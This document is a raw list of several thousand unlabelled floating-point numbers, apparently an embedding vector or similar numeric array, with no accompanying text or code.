0.02219044603407383, 0.002475176705047488, 0.019709527492523193, 0.0009131162078119814, -0.026723483577370644, 0.0036524648312479258, -0.04291071742773056, 0.0001737217971822247, -0.046341124922037125, 0.005532297305762768, -0.006060641258955002, 0.011233052238821983, -0.005842412356287241, 0.015942204743623734, 0.0014098744140937924, -0.020077070221304893, 0.035866133868694305, 0.10946674644947052, 0.02957194671034813, 0.0069986432790756226, 0.004938867408782244, 0.02767297253012657, 0.0019889469258487225, 0.022512046620249748, -0.0005575368995778263, -0.013721629045903683, -0.03742819279432297, -0.006079784128814936, -0.015620604157447815, -0.02699914202094078, -0.004533038008958101, 0.021991360932588577, -0.024656051769852638, 0.053508225828409195, -0.0059649269096553326, -0.011929853819310665, -0.025452395901083946, -0.028653088957071304, -0.032098811119794846, -0.022542675957083702, 0.019923927262425423, -0.027274800464510918, 0.016401633620262146, 0.001456774421967566, -0.019510440528392792, 0.04318637773394585, 0.003011177759617567, 0.01900506764650345, -0.06750551611185074, -0.018668152391910553, 0.046861812472343445, 0.0015228174161165953, -0.027121657505631447, -0.0007551872986368835, 0.004023836925625801, 0.026202797889709473, -0.03464098647236824, -0.016156604513525963, -0.009119676426053047, -0.038653336465358734, 0.008828704245388508, 0.010873165912926197, 0.03219069540500641, -0.00667321402579546, -0.003748179180547595, 0.03513104468584061, -0.03035297803580761, -0.006520070601254702, -0.007592073176056147, -0.018714096397161484, 0.014586887322366238, -0.02418130822479725, -0.04707621410489082, -0.00836927443742752, 0.028224287554621696, 0.032251954078674316, -0.020796842873096466, 0.031317777931690216, -0.022512046620249748, 0.0024043479934334755, 0.03307892754673958, 0.05286502465605736, -0.07779673486948013, -0.019112268462777138, 0.01810152269899845, 0.02448759414255619, -0.027642343193292618, 0.0010681736748665571, 0.006183155812323093, -0.009877734817564487, -0.0019525755196809769, 0.013897743076086044, 0.0012002596631646156, -0.02741262875497341, 0.04300260543823242, -0.03981722518801689, 0.027703600004315376, 0.0007681087590754032, -0.02160850167274475, -0.015789061784744263, 0.011707795783877373, -0.014870202168822289, 0.05865383520722389, -0.026830684393644333, -0.035253558307886124, -0.003989379853010178, -0.0048699527978897095, 0.008323331363499165, -0.027642343193292618, -0.011715453118085861, -0.023982221260666847, 0.01331579964607954, -0.03292578458786011, 0.0406135693192482, -0.023522792384028435, 0.046861812472343445, 0.0010394593700766563, -0.01015339232981205, -0.022282332181930542, -0.054243315011262894, 0.013254541903734207, -0.0049350387416779995, -0.04315574839711189, 0.031225893646478653, -0.020796842873096466, -0.01470940187573433, -0.015988146886229515, -0.006554528139531612, 0.04009288549423218, -0.013430656865239143, -0.006087441463023424, -0.024656051769852638, -0.039327166974544525, 0.0006790942861698568, 0.0006173584260977805, -0.013928371481597424, -0.018867239356040955, 0.018591580912470818, 0.03039892017841339, 0.004724467173218727, -0.01753489300608635, -0.009625048376619816, 0.005099667701870203, 0.0039013223722577095, 0.008598989807069302, -0.012128939852118492, 0.009249848313629627, 0.0013543600216507912, -0.00949487742036581, 0.050414733588695526, -0.015291346237063408, -0.021746331825852394, 0.005972583778202534, 0.07859307527542114, -0.023369649425148964, -0.030123263597488403, 0.003977893851697445, 0.03773447871208191, -0.016861064359545708, -0.029954805970191956, -0.0030590349342674017, 0.017871808260679245, 0.0009045018814504147, -0.009035447612404823, 0.04517723619937897, 0.03454910218715668, -0.04306386038661003, -0.027075713500380516, 0.04180808737874031, -0.007281958125531673, -0.01041373610496521, -0.005402125418186188, -0.003815179457888007, -0.021072501316666603, 0.021593188866972923, -0.006366927642375231, 0.012305053882300854, -0.023721877485513687, 0.046494267880916595, -0.019081639125943184, -0.025758681818842888, -0.02741262875497341, 0.002166975988075137, 0.011975796893239021, 0.0074810441583395, -0.0033346926793456078, 0.017764609307050705, 0.0023143761791288853, -0.010536250658333302, 0.006014698185026646, -0.02093467302620411, 0.033630240708589554, -0.022481419146060944, -0.018484381958842278, 0.005827097687870264, -0.0034208358265459538, -0.007856245152652264, 0.004973324481397867, 0.0058998409658670425, 0.014571573585271835, -0.07730667293071747, 0.019663583487272263, 0.010168706998229027, 0.009433619678020477, -0.028071144595742226, 0.00819316040724516, -0.026417197659611702, 0.015360260382294655, -0.037856992334127426, 0.0007504015811719, -0.024456964805722237, -0.014380143955349922, -0.03666247799992561, 0.0031643209513276815, -0.04680055379867554, -0.004399037919938564, -0.009816478006541729, -0.005631840322166681, 0.05761246383190155, -0.058163776993751526, -0.02920440398156643, -0.012603683397173882, -0.01712140627205372, -0.02019958570599556, 0.0019602326210588217, -0.008576017804443836, -0.010911451652646065, 0.021639131009578705, -0.032313209027051926, -0.00001573306872160174, -0.02078152820467949, 0.02307867631316185, 0.02045992761850357, 0.004590466618537903, -0.02422725036740303, 0.015337289310991764, -0.05883760750293732, 0.026754112914204597, -0.0164322629570961, -0.006240584421902895, -0.005811783485114574, -0.05274251103401184, -0.01742769405245781, -0.038806479424238205, -0.026922570541501045, 0.02637125551700592, 0.005804126616567373, -0.012067682109773159, -0.009372362866997719, 0.008484131656587124, 0.016401633620262146, -0.013422999531030655, -0.009456590749323368, 0.012527111917734146, 0.011638881638646126, 0.003319378476589918, 0.007392986677587032, -0.000855687481816858, 0.0010270164348185062, 0.04680055379867554, 0.033048298209905624, 0.054702743887901306, 0.0034552928991615772, 0.02313993312418461, -0.03124120831489563, -0.02589651197195053, 0.01423465833067894, -0.014540944248437881, -0.012963569723069668, -0.023155247792601585, 0.005268125329166651, 0.020796842873096466, 0.008223788812756538, 0.0203067846596241, 0.0011562310392037034, -0.005187725182622671, 0.00011126809113193303, -0.019219469279050827, -0.030996179208159447, 0.05562160164117813, -0.028653088957071304, 0.03464098647236824, -0.015321974642574787, 0.007909844629466534, 0.021991360932588577, 0.005532297305762768, -0.02805582992732525, -0.0003079613670706749, -0.028331488370895386, 0.0040314942598342896, 0.05381451174616814, -0.04370706155896187, -0.013269856572151184, 0.012894655577838421, -0.02961789071559906, 0.04009288549423218, -0.016003461554646492, -0.0037960365880280733, -0.044870950281620026, 0.05127233639359474, -0.0108884796500206, -0.04159368574619293, -0.026187483221292496, 0.009303447790443897, -0.03856145218014717, -0.027918001636862755, 0.03990911319851875, -0.04710683971643448, 0.02444165013730526, -0.007274300791323185, 0.0010078735649585724, 0.001078702276572585, 0.001732432167045772, 0.03617241978645325, 0.005784983281046152, 0.007572930306196213, 0.025651482865214348, -0.009303447790443897, 0.014985060319304466, 0.0007293443777598441, -0.004322465974837542, 0.01591157540678978, 0.05108856409788132, 0.0064970990642905235, 0.0013438314199447632, 0.006968014407902956, -0.054090168327093124, 0.02292553335428238, -0.03479412943124771, 0.023063361644744873, 0.021884160116314888, 0.017856493592262268, 0.015092260204255581, 0.015184146352112293, -0.01946449838578701, 0.013461285270750523, 0.003935779444873333, -0.012833397835493088, -0.006588985212147236, 0.0031107207760214806, -0.010145735926926136, -0.009004819206893444, -0.005815612152218819, -0.022956162691116333, -0.03611116111278534, -0.0461573526263237, -0.012733855284750462, 0.03568236157298088, -0.011294309049844742, 0.025130795314908028, -0.022205760702490807, -0.018040265887975693, -0.006891442928463221, -0.066525399684906, -0.018606895580887794, -0.02454885095357895, 0.031164636835455894, -0.04003162682056427, -0.02736668661236763, 0.007653330452740192, 0.0007145086419768631, 0.0001085162948584184, 0.018070895224809647, 0.0014184886822476983, -0.025038909167051315, -0.006990985944867134, 0.028699031099677086, -0.009479562751948833, -0.02768828719854355, 0.016769178211688995, -0.004873781464993954, 0.0033825498539954424, 0.04704558476805687, 0.05105793476104736, -0.01493911724537611, -0.01146276667714119, 0.011684824712574482, -0.02522268146276474, 0.002926948945969343, 0.02814771607518196, 0.0005709368851967156, -0.017749294638633728, 0.0026455484330654144, 0.0347328707575798, 0.026447826996445656, -0.001362974289804697, 0.027091028168797493, -0.05286502465605736, -0.000048963942390400916, -0.02929629012942314, 0.0013218170497566462, 0.01721329241991043, 0.009977278299629688, -0.0012337596854194999, -0.007071386091411114, -0.009510191157460213, 0.017764609307050705, -0.0169988926500082, 0.029005317017436028, 0.004027665592730045, 0.01669260673224926, -0.02186884544789791, 0.005976412445306778, -0.025100165978074074, -0.02941880375146866, 0.009479562751948833, 0.04196123033761978, 0.0024234908632934093, 0.006768928375095129, -0.017979009076952934, 0.019495125859975815, 0.009923677891492844, 0.00993899255990982, -0.032006923109292984, -0.0420837439596653, 0.016003461554646492, -0.0164322629570961, -0.01836186647415161, -0.0072398437187075615, -0.023522792384028435, -0.005030753556638956, -0.040429797023534775, -0.007297272328287363, -0.039265912026166916, 0.012726197950541973, 0.01057453639805317, 0.025421766564249992, 0.022481419146060944, -0.008116587996482849, -0.010850193910300732, -0.01556700374931097, 0.03635618835687637, 0.024992967024445534, 0.015352603048086166, 0.03470224514603615, 0.0020616899710148573, 0.032006923109292984, -0.0040085227228701115, -0.021011244505643845, -0.004785724449902773, -0.024656051769852638, 0.020000498741865158, -0.0031662352848798037, -0.008147217333316803, 0.0016281034331768751, 0.025973083451390266, -0.0016424605855718255, 0.008652589283883572, -0.015008031390607357, 0.027872057631611824, -0.03794888034462929, 0.005046067759394646, -0.01952575519680977, 0.008997161872684956, -0.022312961518764496, 0.01245054043829441, -0.007726073265075684, 0.007886873558163643, 0.004686181433498859, -0.010681736283004284, 0.014357172884047031, 0.02637125551700592, -0.002524948213249445, 0.011585281230509281, -0.022986790165305138, 0.013959000818431377, 0.007649501785635948, -0.004372237715870142, 0.0027508342172950506, 0.0023086334113031626, 0.002366062020882964, -0.037336304783821106, -0.006508585065603256, -0.004054465796798468, -0.0027316913474351168, 0.02552896738052368, -0.030674578621983528, 0.00003209426358807832, 0.0034457214642316103, -0.017351122573018074, 0.023155247792601585, -0.009066076017916203, 0.008905275724828243, -0.005451897159218788, 0.019541069865226746, -0.010712365619838238, -0.0038840938359498978, -0.039847854524850845, 0.0017037178622558713, -0.03454910218715668, -0.013951343484222889, 0.03298703953623772, 0.03160875290632248, -0.031011493876576424, 0.0008599946741014719, 0.021011244505643845, 0.007894530892372131, -0.01816278137266636, 0.011975796893239021, 0.02150130271911621, -0.01664666272699833, -0.018193408846855164, -0.006324813235551119, -0.0003615614550653845, 0.009150304831564426, 0.00047139383968897164, -0.0034686930011957884, 0.011845625005662441, -0.026937885209918022, 0.026447826996445656, 0.007660987321287394, -0.033875271677970886, -0.017626779153943062, -0.003614179091528058, 0.0005718940519727767, -0.008415217511355877, -0.015727804973721504, 0.021593188866972923, 0.0009638448827899992, 0.016187233850359917, 0.019709527492523193, -0.017458321526646614, 0.0012653454905375838, -0.013913057744503021, -0.01334642805159092, 0.004291837569326162, -0.005513154435902834, 0.028086459264159203, 0.029235033318400383, -0.040000997483730316, 0.023875020444393158, -0.03258886933326721, 0.009487220086157322, 0.03773447871208191, -0.010421393439173698, -0.020230213180184364, -0.014602201990783215, -0.013522542081773281, -0.031149322167038918, 0.02903594635426998, 0.0004666081222239882, -0.02810177206993103, -0.026616284623742104, 0.004326294641941786, 0.014249972999095917, -0.005811783485114574, -0.02831617370247841, 0.0018405895680189133, -0.006213784217834473, 0.029280975461006165, -0.02286427654325962, 0.007986417040228844, -0.015337289310991764, -0.00638224184513092, 0.007683958858251572, -0.002490490907803178, 0.024656051769852638, 0.02825491689145565, -0.01742769405245781, -0.03868396580219269, 0.0008571232319809496, 0.007760530337691307, 0.030674578621983528, 0.0021286902483552694, 0.02931160479784012, 0.03776510804891586, -0.018913181498646736, -0.024656051769852638, -0.04263506084680557, -0.022588618099689484, -0.010819565504789352, -0.010689393617212772, 0.010980365797877312, -0.01935729756951332, -0.028178345412015915, 0.007672473322600126, 0.006945042870938778, 0.031578123569488525, 0.0031298636458814144, 0.0019717183895409107, 0.015130545943975449, -0.002354576252400875, -0.006665556691586971, -0.020551813766360283, 0.021011244505643845, 0.019081639125943184, -0.011010994203388691, -0.020582443103194237, 0.0031624066177755594, -0.0030494634993374348, 0.004399037919938564, 0.00011653238470898941, -0.029434118419885635, 0.010605164803564548, 0.00011324220395181328, 0.007653330452740192, -0.04245128855109215, -0.002923120278865099, 0.05191553756594658, -0.01716735027730465, 0.03039892017841339, 0.039020881056785583, -0.004885267466306686, -0.03167000785470009, 0.026509083807468414, -0.01983204111456871, -0.011416823603212833, 0.010628136806190014, -0.0310268085449934, 0.012090654112398624, 0.006202298682183027, -0.020750900730490685, 0.02219044603407383, 0.016125977039337158, -0.009288134053349495, 0.01909695379436016, 0.01143213827162981, -0.002099975710734725, -0.004173151683062315, 0.01585031859576702, -0.015115231275558472, 0.018959125503897667, 0.0010471164714545012, -0.03061332181096077, 0.0049082390032708645, 0.0004958010395057499, -0.022175131365656853, 0.013568485155701637, -0.027856742963194847, -0.05197679251432419, -0.004678524099290371, -0.02349216304719448, 0.018775353208184242, -0.021792273968458176, -0.018438437953591347, 0.0022550332359969616, 0.010023221373558044, 0.02238953299820423, -0.006286527495831251, -0.04263506084680557, 0.009946648962795734, 0.013453627936542034, -0.014349515549838543, 0.0022358903661370277, 0.01070470828562975, 0.006891442928463221, -0.016723234206438065, 0.018959125503897667, 0.020643699914216995, 0.010176364332437515, 0.0076112160459160805, -0.006899100262671709, -0.02490108087658882, -0.016508834436535835, 0.0016080033965408802, 0.023936279118061066, -0.036876875907182693, 0.03185378015041351, 0.012818084098398685, 0.005926641169935465, 0.02113375812768936, -0.009173275902867317, -0.022404847666621208, 0.012871683575212955, 0.032833896577358246, -0.010206992737948895, -0.011340252123773098, -0.006703842431306839, -0.019862670451402664, 0.01012276392430067, -0.01264196913689375, -0.0007829444948583841, 0.0012165311491116881, -0.00036610790994018316, 0.01323922723531723, -0.012810426764190197, 0.023201191797852516, -0.0036582075990736485, 0.015360260382294655, 0.017825866118073463, -0.03329332545399666, -0.00949487742036581, 0.015681860968470573, -0.03963345289230347, 0.008154873736202717, 0.044289007782936096, 0.029235033318400383, 0.005271953996270895, -0.006864642724394798, 0.004062122665345669, -0.044717807322740555, 0.0179024375975132, 0.009142647497355938, -0.00614869873970747, 0.016233175992965698, -0.007718415930867195, 0.01130196638405323, 0.02307867631316185, 0.0010854022111743689, -0.006680870894342661, 0.024303821846842766, -0.020015813410282135, 0.005524639971554279, -0.015390889719128609, 0.020735586062073708, 0.012396940030157566, 0.0026072626933455467, 0.011033966206014156, 0.027872057631611824, 0.007848587818443775, -0.034457214176654816, -0.010505622252821922, 0.004479438066482544, -0.02412004955112934, -0.017305178567767143, 0.03617241978645325, -0.02418130822479725, 0.0070675574243068695, 0.0040736086666584015, -0.000005069876806373941, 0.015498089604079723, -0.01857626810669899, 0.007971102371811867, -0.0018252752488479018, 0.005647154524922371, -0.025988396257162094, 0.002831234596669674, 0.012228482402861118, -0.0026570342015475035, 0.0025077194441109896, -0.018438437953591347, -0.045606039464473724, 0.014916145242750645, -0.011531680822372437, 0.03274201229214668, -0.0020329756662249565, 0.012473511509597301, 0.02340027689933777, 0.005819440819323063, -0.013805857859551907, -0.00016510748537257314, 0.009050761349499226, 0.002727862913161516, 0.025192052125930786, -0.003472521435469389, 0.0020770044066011906, -0.014602201990783215, 0.026815369725227356, -0.0031624066177755594, -0.025728054344654083, -0.017397064715623856, -0.0020770044066011906, 0.010390764102339745, -0.03249698132276535, -0.0032236638944596052, -0.031072750687599182, 0.01057453639805317, 0.017488950863480568, 0.021225644275546074, 0.026570340618491173, -0.0059687551110982895, 0.01706014946103096, -0.02297147735953331, 0.01888255402445793, -0.000876744685228914, -0.018775353208184242, 0.02831617370247841, -0.005352354142814875, 0.034610357135534286, 0.01712140627205372, -0.011409166269004345, -0.008874647319316864, 0.02203730307519436, 0.009479562751948833, -0.0065124137327075005, -0.04928147420287132, 0.020965300500392914, 0.006026184186339378, -0.01905101165175438, -0.02957194671034813, 0.009433619678020477, 0.004069779999554157, -0.03206818178296089, -0.009793506003916264, 0.009479562751948833, -0.010291221551597118, -0.007588244508951902, 0.024411022663116455, -0.018714096397161484, 0.03476350009441376, -0.0056356689892709255, 0.013101398944854736, 0.021991360932588577, -0.04631049558520317, -0.008078302256762981, -0.011478081345558167, -0.04140991345047951, -0.002440719399601221, 0.010643450543284416, -0.017657408490777016, -0.03271138295531273, -0.04082797095179558, 0.03035297803580761, 0.04144054278731346, -0.016769178211688995, -0.004127208609133959, -0.030046692118048668, 0.004027665592730045, -0.010536250658333302, -0.02925034612417221, 0.00446029519662261, -0.018928496167063713, -0.009349390864372253, -0.01706014946103096, 0.06260493397712708, 0.002894405974075198, -0.016769178211688995, 0.015789061784744263, 0.006255898624658585, 0.024763252586126328, -0.01753489300608635, -0.04030728340148926, -0.019908612594008446, 0.029127832502126694, -0.02355341985821724, 0.024043478071689606, 0.007618872914463282, 0.045912325382232666, 0.005137953441590071, -0.004276523366570473, -0.0067765857093036175, 0.01664666272699833, -0.009188590571284294, -0.017305178567767143, -0.03295641019940376, 0.0069335573352873325, -0.013017170131206512, -0.012182539328932762, -0.005203039385378361, -0.02078152820467949, 0.023844392970204353, -0.009916020557284355, 0.026555027812719345, -0.008285045623779297, -0.03537607565522194, 0.015191802754998207, -0.030368292704224586, -0.03635618835687637, -0.02591182477772236, 0.006332470569759607, 0.0275198295712471, 0.012113625183701515, 0.005076696164906025, 0.025773996487259865, 0.010972708463668823, -0.007056071888655424, 0.0004503366653807461, -0.021792273968458176, -0.017412379384040833, -0.015896262601017952, 0.005229839589446783, -0.014487344771623611, -0.015306660905480385, 0.022144503891468048, -0.026570340618491173, -0.005784983281046152, -0.010467336513102055, 0.02805582992732525, 0.019770784303545952, 0.00993899255990982, -0.01716735027730465, -0.017749294638633728, 0.0109880231320858, 0.014847231097519398, -0.023048048838973045, 0.006642585154622793, -0.04520786553621292, -0.023568734526634216, 0.004678524099290371, 0.008805732242763042, 0.018851924687623978, 0.04992467537522316, 0.004295666236430407, 0.04961838945746422, 0.012534769251942635, -0.0078103020787239075, -0.017871808260679245, -0.0108884796500206, 0.005356182809919119, -0.012932941317558289, 0.019112268462777138, -0.020383356139063835, -0.017810551449656487, -0.03151686489582062, 0.012151910923421383, 0.009648020379245281, -0.0173664353787899, 0.004483266733586788, 0.012802769429981709, -0.0019382183672860265, 0.026708170771598816, -0.04015414044260979, 0.012718540616333485, 0.0019257754320278764, -0.022741761058568954, -0.025498338043689728, -0.029602576047182083, -0.02753514237701893, -0.0432170033454895, -0.027244171127676964, 0.027136970311403275, 0.0005101581919007003, -0.00134095991961658, 0.012519454583525658, -0.001467303023673594, -0.0020119184628129005, -0.0339977853000164, 0.024456964805722237, -0.013277513906359673, 0.00521835358813405, -0.005287268199026585, 0.017626779153943062, -0.012971227057278156, -0.012886998243629932, -0.02532988227903843, 0.006424356251955032, 0.016968263313174248, 0.02448759414255619, -0.024793880060315132, 0.007216872181743383, -0.010919108055531979, 0.009816478006541729, 0.007236015051603317, 0.017917752265930176, -0.00359120755456388, -0.010467336513102055, 0.016769178211688995, 0.022420160472393036, -0.0006743085687048733, -0.0002634541306179017, -0.003788379253819585, -0.004973324481397867, -0.006960357539355755, -0.02208324521780014, 0.007220700848847628, -0.0350697860121727, -0.019663583487272263, 0.008124245330691338, 0.022542675957083702, 0.0025996053591370583, -0.04918958991765976, -0.0071058436296880245, -0.0036850078031420708, 0.005302582401782274, 0.013331113383173943, 0.001869303872808814, 0.016401633620262146, -0.007002471946179867, 0.00434543751180172, 0.002716377144679427, 0.04903644695878029, -0.015398546122014523, -0.011554652824997902, 0.0049082390032708645, 0.0016826606588438153, -0.007534644100815058, 0.0032887498382478952, -0.007236015051603317, -0.025100165978074074, -0.018698781728744507, 0.009150304831564426, -0.04337014630436897, -0.03454910218715668, -0.015444489195942879, -0.002670434070751071, 0.012473511509597301, -0.0008288874523714185, 0.001646289136260748, 0.01779523678123951, 0.01925009675323963, -0.012082996778190136, -0.005765840411186218, 0.025942454114556313, -0.03491664305329323, 0.0012548168888315558, -0.008514760993421078, -0.020276157185435295, -0.012825741432607174, -0.02249673195183277, -0.025406453758478165, -0.009196247905492783, 0.029970120638608932, -0.04202248901128769, 0.003962579648941755, 0.023415591567754745, -0.016876379027962685, 0.020704956725239754, 0.0006470298976637423, -0.015321974642574787, -0.02208324521780014, -0.013867114670574665, -0.0026015196926891804, -0.014671116136014462, 0.004812524188309908, 0.020322099328041077, 0.09262099117040634, 0.011210080236196518, 0.02275707572698593, -0.017182664945721626, 0.00433012330904603, 0.01805558055639267, 0.020383356139063835, 0.015145860612392426, 0.017810551449656487, 0.02444165013730526, 0.027657657861709595, 0.006822528317570686, -0.008874647319316864, -0.013522542081773281, 0.013422999531030655, 0.001962146954610944, -0.009272819384932518, -0.013729285448789597, 0.030812406912446022, -0.008553046733140945, -0.010398421436548233, 0.019694212824106216, 0.030429549515247345, 0.003432321362197399, 0.013867114670574665, -0.018545638769865036, -0.012802769429981709, -0.013614428229629993, -0.016294434666633606, -0.005846240557730198, 0.00792515929788351, -0.01957169733941555, -0.0249163955450058, -0.003874522401019931, -0.010559221729636192, 0.005605040118098259, 0.003043720731511712, -0.017810551449656487, -0.017917752265930176, -0.001110288081690669, -0.017718665301799774, -0.010337164625525475, -0.01638632081449032, 0.021332845091819763, 0.006948871538043022, -0.021470673382282257, 0.02035272866487503, 0.007454243954271078, -0.0042305802926421165, -0.0034801787696778774, -0.02271113358438015, -0.012649626471102238, 0.02946474775671959, 0.023155247792601585, 0.0057045831345021725, 0.010206992737948895, -0.02182290330529213, -0.011141166090965271, -0.028346801176667213, -0.032098811119794846, -0.002748920116573572, 0.020031128078699112, -0.0005178153514862061, 0.02778017148375511, -0.00528343953192234, -0.010949737392365932, -0.01206002477556467, 0.01758083701133728, 0.0063133276998996735, 0.031149322167038918, -0.004655552562326193, 0.0083999028429389, 0.002651291200891137, 0.013453627936542034, 0.008652589283883572, 0.037336304783821106, -0.00478955265134573, 0.007584415841847658, -0.0313943512737751, -0.003954922314733267, 0.01159293856471777, 0.024656051769852638, -0.02156255953013897, 0.02673879824578762, -0.00652772793546319, 0.035498589277267456, -0.019694212824106216, 0.009984934702515602, -0.0038936652708798647, -0.009946648962795734, -0.00490441033616662, -0.0027202055789530277, 0.01026059314608574, -0.0002634541306179017, 0.008943561464548111, 0.0057275546714663506, 0.00007968230784172192, -0.017871808260679245, -0.014318887144327164, -0.013599114492535591, 0.006037669721990824, -0.0012107882648706436, 0.024564165621995926, -0.014464372768998146, -0.020858101546764374, 0.001530474633909762, -0.010298878885805607, 0.0005642368923872709, 0.006152526941150427, 0.0023584049195051193, -0.031945668160915375, -0.03552921861410141, 0.005922812502831221, -0.019954556599259377, -0.003298321273177862, -0.013606770895421505, 0.002484748139977455, -0.0013802028261125088, -0.016616035252809525, -0.035039160400629044, -0.03929653763771057, -0.003769236383959651, 0.020704956725239754, -0.013407684862613678, 0.009755220264196396, 0.025038909167051315, 0.0004027186951134354, -0.01853032410144806, 0.041471172124147415, 0.03528418764472008, 0.03307892754673958, -0.0016912749269977212, -0.003997036721557379, 0.006891442928463221, 0.023629991337656975, -0.011110537685453892, 0.019234783947467804, 0.006294184364378452, -0.012121282517910004, 0.0015055888798087835, -0.0006432013469748199, 0.028454001992940903, 0.02810177206993103, 0.02814771607518196, 0.0027393486816436052, -0.0010413735872134566, 0.01512288860976696, 0.004770409781485796, 0.02454885095357895, -0.01067407988011837, -0.011822653003036976, -0.028346801176667213, 0.016294434666633606, 0.036448076367378235, 0.016616035252809525, 0.02318587712943554, 0.02920440398156643, -0.004682352766394615, -0.007362358272075653, -0.006259727291762829, -0.013208598829805851, -0.007224529515951872, -0.002090404275804758, -0.012396940030157566, 0.0004165972932241857, 0.027045084163546562, -0.0033825498539954424, -0.07644907385110855, -0.0049350387416779995, -0.027351371943950653, 0.009625048376619816, 0.012557740323245525, -0.009594419971108437, 0.007971102371811867, -0.002429233631119132, 0.009762877598404884, -0.011516367085278034, 0.01143213827162981, 0.02052118629217148, -0.010497964918613434, 0.004215266089886427, 0.013514885678887367, 0.011845625005662441, -0.014043229632079601, 0.017779922112822533, -0.039847854524850845, -0.001236631185747683, -0.003168149385601282, -0.049220215529203415, 0.01232036855071783, 0.00741595821455121, 0.021991360932588577, -0.00999259203672409, 0.0026876628398895264, -0.006795728579163551, -0.02690725587308407, 0.0034495501313358545, -0.007442758418619633, -0.019648268818855286, 0.002471348037943244, -0.0217769593000412, -0.008698532357811928, -0.009977278299629688, 0.013981971889734268, -0.002186118857935071, -0.030643949285149574, 0.0028656916692852974, 0.012496483512222767, -0.016309747472405434, 0.0077452161349356174, -0.012488826178014278, -0.0025498338509351015, 0.014686430804431438, 0.014594544656574726, 0.0018539895536378026, 0.014211687259376049, -0.0015706747071817517, -0.03182315081357956, -0.009961963631212711, 0.00352612161077559, -0.021485988050699234, -0.004701495636254549, 0.006719157099723816, 0.004222922958433628, -0.017136720940470695, 0.005758183542639017, 0.02364530600607395, -0.012932941317558289, 0.003912808373570442, 0.013583799824118614, -0.02464073710143566, -0.004716809839010239, -0.0124581977725029, 0.015942204743623734, 0.0005843369290232658, -0.017305178567767143, 0.005918983835726976, 0.011891568079590797, 0.013162655755877495, -0.008009388111531734, -0.009349390864372253, -0.007779673207551241, -0.026754112914204597, -0.0046708667650818825, -0.015337289310991764, -0.0002493362408131361, 0.006409042049199343, 0.015176489017903805, -0.015260717831552029, 0.0275198295712471, -0.010589851066470146, 0.005555268842726946, -0.0027604056522250175, -0.023584049195051193, -0.0037098934408277273, 0.015988146886229515, 0.007193900644779205, 0.0064702993258833885, 0.007660987321287394, 0.019923927262425423, 0.00010726004256866872, -0.029694462195038795, -0.017550207674503326, 0.017412379384040833, -0.02318587712943554, 0.021485988050699234, -0.0032485495321452618, -0.01222082506865263, 0.00278720585629344, 0.0011323023354634643, 0.014946773648262024, 0.0062329270876944065, 0.026555027812719345, 0.010214650072157383, -0.009739905595779419, 0.008752132765948772, -0.011952824890613556, -0.01290231291204691, -0.00483932439237833, -0.004291837569326162, -0.008851675316691399, 0.0398784838616848, 0.014433744363486767, -0.012864027172327042, 0.003338521346449852, -0.02004644274711609, -0.02940348908305168, -0.0036696933675557375, -0.03030703403055668, 0.007392986677587032, 0.011079909279942513, 0.01248116884380579, -0.001237588352523744, -0.022573303431272507, 0.022803019732236862, 0.005490182898938656, -0.01900506764650345, 0.022940848022699356, -0.012282082810997963, -0.02182290330529213, 0.0273207426071167, 0.035498589277267456, 0.018086209893226624, -0.0008887089788913727, -0.011929853819310665, 0.004065951332449913, -0.024089422076940536, -0.0028159201610833406, 0.0026780914049595594, -0.0007221658015623689, -0.0019497040193527937, -0.01601877622306347, -0.005673954728990793, -0.022956162691116333, 0.0084994463250041, 0.0108884796500206, 0.0012069597141817212, -0.01111819501966238, -0.034671615809202194, -0.0034361500293016434, 0.026861313730478287, 0.004743610043078661, -0.017887122929096222, -0.03265012428164482, -0.0124581977725029, 0.007794987875968218, 0.011661852709949017, 0.01303248479962349, 0.004027665592730045, -0.021761644631624222, 0.0184690672904253, 0.019541069865226746, 0.023109305649995804, -0.014602201990783215, 0.008614303544163704, -0.008522417396306992, -0.009349390864372253, -0.0054633826948702335, 0.009670991450548172, -0.01127899531275034, -0.02502359449863434, 0.013966658152639866, -0.01879066787660122, 0.01647820509970188, 0.007837101817131042, 0.009035447612404823, 0.012649626471102238, 0.016815120354294777, -0.005712240468710661, -0.010520935989916325, -0.02056712843477726, -0.017917752265930176, -0.006558356340974569, 0.012213168665766716, 0.01857626810669899, 0.013223913498222828, 0.0075461301021277905, -0.0011782452929764986, 0.005918983835726976, -0.013981971889734268, -0.010781279765069485, 0.00021176830341573805, -0.0006503799231722951, 0.020475242286920547, 0.001751575036905706, -0.016080033034086227, -0.011478081345558167, -0.004437323659658432, -0.001288317027501762, -0.02742794342339039, -0.010942080058157444, 0.01213659718632698, 0.016677292063832283, -0.008928246796131134, -0.008859332650899887, 0.012649626471102238, 0.010850193910300732, -0.02784143015742302, -0.022052617743611336, 0.01820872351527214, -0.008223788812756538, -0.010911451652646065, -0.004004694055765867, 0.008070645853877068, -0.021654445677995682, 0.016554776579141617, -0.016233175992965698, -0.00020076113287359476, 0.005229839589446783, -0.005405954085290432, -0.01753489300608635, 0.011991110630333424, -0.011899224482476711, 0.02877560257911682, 0.028484631329774857, 0.005141782108694315, 0.016922321170568466, -0.0033921212889254093, -0.014954430982470512, 0.0018472896190360188, 0.010842536576092243, 0.018407810479402542, 0.0020214898977428675, 0.01753489300608635, 0.02076621539890766, 0.0011859025107696652, 0.006791899912059307, -0.024043478071689606, 0.043308891355991364, -0.01538323238492012, 0.030444864183664322, -0.00818550307303667, 0.02758108638226986, -0.011033966206014156, -0.03292578458786011, 0.004594295285642147, -0.016830435022711754, 0.000956666306592524, -0.0254830252379179, -0.0007092443411238492, -0.0030571206007152796, 0.005187725182622671, -0.0024962336756289005, -0.014877859503030777, 0.01621786318719387, -0.012044711038470268, 0.006680870894342661, -0.005034581758081913, -0.004303323104977608, -0.009410648606717587, -0.002798691624775529, 0.007358529604971409, -0.008262074552476406, 0.0025211195461452007, 0.016891691833734512, -0.012412254698574543, -0.022282332181930542, -0.02805582992732525, -0.007668644655495882, 0.00042210088577121496, 0.004942696075886488, -0.014946773648262024, -0.004111894406378269, 0.014441401697695255, 0.0001947789714904502, -0.018407810479402542, -0.009242190979421139, -0.0018530323868617415, 0.001110288081690669, -0.0036505504976958036, 0.026539713144302368, -0.00665789982303977, 0.015176489017903805, 0.01725923642516136, 0.006715328432619572, -0.002680005505681038, 0.011531680822372437, 0.003947265446186066, 0.002513462444767356, -0.010865508578717709, 0.024778565391898155, -0.009357048198580742, 0.01857626810669899, 0.015835003927350044, -0.010720022022724152, 0.024257879704236984, -0.006493270862847567, -0.014824259094893932, 0.010513278655707836, 0.0009442234295420349, 0.019280726090073586, 0.0021899475250393152, 0.00823910254985094, -0.015046317130327225, -0.0028216629289090633, 